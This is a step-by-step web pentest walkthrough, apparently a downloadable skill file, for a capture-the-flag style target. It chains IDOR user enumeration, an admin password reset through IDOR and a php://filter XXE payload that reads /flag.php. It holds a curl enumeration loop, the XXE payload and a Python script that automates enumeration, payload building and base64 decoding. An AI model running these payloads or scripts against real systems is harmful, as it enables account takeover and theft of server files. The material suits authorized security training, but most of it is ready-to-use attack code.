Step-by-step guide to exploiting IDOR vulnerabilities and XXE injection in a web application pentest scenario. Learn privilege escalation techniques using API enumeration and PHP filter chains.
A practical walkthrough for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities and XML External Entity (XXE) injection in web applications during authorized penetration testing engagements.
You are performing an authorized penetration test for a company's social network web application. Your objective is to escalate privileges and exploit vulnerabilities to read the flag located at `/flag.php`.
**Target:** `94.237.53.52:5948` (example target - replace with your actual authorized target)
**Initial Credentials:**
1. **Configure your HTTP proxy** (Caido or Burp Suite) to intercept traffic
2. **Navigate to the target application** at the provided IP and port
3. **Log in using the provided credentials** and capture the authentication flow
4. **Analyze the login sequence** in your proxy:
- Look for redirect responses (3xx, typically 301 or 302) following a successful login
- Identify the 200 OK responses that follow the redirect and note which page they render
- Note any API endpoints being called in the background (XHR/fetch requests to `/api.php/...`)
5. **Identify API endpoints** that reference user-specific data
- Common pattern: `/api.php/user/{id}` or similar
- In this scenario, focus on endpoints like `/api.php/user/74`
6. **Enumerate user IDs** by modifying the user parameter:
```bash
# Example enumeration using curl: print the user id next to each hit so the
# admin's id is not lost in the output
for i in {1..100}; do
  body=$(curl -s "http://TARGET:PORT/api.php/user/$i" \
    -H "Cookie: YOUR_SESSION_COOKIE")
  echo "$body" | grep -qi 'admin\|username' && echo "[$i] $body"
done
```
7. **Locate the admin user** through enumeration
- Document the admin user ID when found
- Note any exposed information (username, email, etc.)
8. **Navigate to the password reset functionality** (e.g., `/reset.php`)
9. **Test for IDOR in password reset**:
- Intercept the password reset request and note which parameter carries the user ID (form field, query string, or JSON body)
- Modify the user ID parameter to the admin ID found during enumeration, keeping your own session cookie
- Submit a new password for the admin user; a successful response without any token bound to the admin's identity confirms the IDOR
10. **Verify admin access** by logging in with the newly set admin credentials
11. **Identify XML input points** in the application
- Common locations: contact forms, data export/import features, API endpoints accepting XML
12. **Craft an XXE payload** using the PHP filter wrapper to exfiltrate `/flag.php`. The base64 encoding is needed because the raw PHP source contains `<?php ... ?>` and other characters that would be interpreted as XML when the entity is expanded; encoding it keeps the document well-formed. The entity reference must be placed in an element the application echoes back (here `<name>`):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY Test SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">
]>
<root>
<name>&Test;</name>
<details>XXE exploitation test</details>
<date></date>
</root>
```
13. **Submit the XXE payload** through the identified XML input point
14. **Extract and decode the response**:
```bash
# Copy the base64-encoded response
echo "BASE64_OUTPUT_HERE" | base64 -d
```
15. **Retrieve the flag** from the decoded PHP source code
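The two procedures above (steps 6-7, enumerating user IDs to find the admin, and steps 12-15, building the XXE payload and decoding the reflected base64) can be scripted together. The following is an added example, not part of the original walkthrough; it assumes the user API returns JSON with a `username` field and that the reflected `<name>` value appears somewhere in the response body. The user records and XXE response embedded below are constructed sample data so the script runs offline; pass `fetch_user_http` and a real `requests`-style submit function against an authorized target.

```python
import base64
import json
import re
import urllib.request

# Assumed API shape: JSON with a "username" key (not confirmed by the page)
ADMIN_USERNAME = "admin"


def fetch_user_http(base_url, cookie):
    """Return a fetch(uid) callable that hits /api.php/user/{uid} with the session cookie."""
    def fetch(uid):
        req = urllib.request.Request(
            f"{base_url}/api.php/user/{uid}", headers={"Cookie": cookie})
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.read().decode(errors="replace")
        except Exception:
            return ""
    return fetch


def is_admin_record(body):
    """True when the record's username is admin; falls back to a substring check."""
    try:
        data = json.loads(body)
        if isinstance(data, dict):
            return str(data.get("username", "")).lower() == ADMIN_USERNAME
    except ValueError:
        pass
    return ADMIN_USERNAME in body.lower()


def find_admin(fetch, ids):
    """Walk candidate user IDs and return (uid, body) for the first admin record, or None."""
    for uid in ids:
        body = fetch(uid)
        if body and is_admin_record(body):
            return uid, body
    return None


def xxe_payload(path="/flag.php", entity="Test"):
    """Build the php://filter XXE document from the walkthrough, base64-encoding the target file."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE email [\n"
        f'<!ENTITY {entity} SYSTEM "php://filter/convert.base64-encode/resource={path}">\n'
        "]>\n"
        "<root>\n"
        f"<name>&{entity};</name>\n"
        "<details>XXE exploitation test</details>\n"
        "<date></date>\n"
        "</root>\n"
    )


def extract_b64(response_text):
    """Pull the longest base64-looking run out of the reflected response."""
    runs = re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", response_text)
    return max(runs, key=len) if runs else None


def decode_flag_source(response_text):
    """Decode the reflected base64 back into the PHP source of /flag.php."""
    b64 = extract_b64(response_text)
    return base64.b64decode(b64).decode(errors="replace") if b64 else None


# Constructed sample data (not captured from any real target)
SAMPLE_USERS = {
    1: '{"uid":"1","username":"alice","email":"alice@example.com"}',
    2: '{"uid":"2","username":"bob","email":"bob@example.com"}',
    10: '{"uid":"10","username":"admin","email":"admin@example.com"}',
}
SAMPLE_FLAG_SRC = "<?php\n$flag = 'FLAG{constructed_sample_value}';\n?>\n"
SAMPLE_XXE_RESPONSE = (
    "Check your email for further instructions to "
    + base64.b64encode(SAMPLE_FLAG_SRC.encode()).decode()
)

if __name__ == "__main__":
    hit = find_admin(lambda uid: SAMPLE_USERS.get(uid, ""), range(1, 101))
    print("admin record:", hit)
    print(xxe_payload())
    print("decoded:", decode_flag_source(SAMPLE_XXE_RESPONSE))
```

Against a live target, replace the lambda with `fetch_user_http("http://TARGET:PORT", "PHPSESSID=...")` and submit `xxe_payload()` to the XML endpoint yourself; `decode_flag_source` only needs the response body. Keep the enumeration range small and rate-limited on an engagement, since every request is logged against your session.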
# Download SKILL.md from killerskills.ai/api/skills/web-app-pentest-idor-and-xxe-exploitation-q2si15/raw